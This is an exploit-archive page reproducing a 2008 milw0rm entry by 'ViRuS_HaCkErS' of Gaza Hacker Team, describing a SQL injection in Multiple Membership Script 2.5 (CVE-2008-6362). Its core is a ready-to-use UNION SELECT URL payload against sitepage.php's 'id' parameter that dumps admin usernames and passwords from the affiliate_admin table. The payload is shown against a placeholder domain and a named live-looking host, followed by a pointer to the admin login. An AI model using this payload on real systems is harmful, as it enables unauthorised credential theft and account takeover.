[] NeoSense
E X P L O I T S
title author type platform port cve id

Multiple Membership Script 2.5 - 'id' SQL Injection

Author: ViRuS_HaCkErS
type: webapps
platform: php
port: 
date_added: 2008-12-04 
date_updated:  
verified: 1 
codes: OSVDB-50575;CVE-2008-6362 
tags: 
aliases:  
screenshot_url:  
application_url: 
================================================
  Multiple Membership Script V 2.5 SQL Injection Vulnerability
================================================
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. Gaza Hacker Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

AUTHOR : ViRuS_HaCkErS
Email  : h8g@hotmail.com
SITE   : gaza-hacker.com  & hacker.ps

#####################################################
#####################################################
---------
 Exploit
---------
SQL Injection Vulnerability

http://www.site.com/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin

sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
http://www.pricelesshost.com/mmsv2/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin

Login : http://www.site.com/admin

#######################################################################################
Gaza Hacker TeaM : Le0n &  Lito & cLAw & zero cod
#######################################################################################

# milw0rm.com [2008-12-05]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.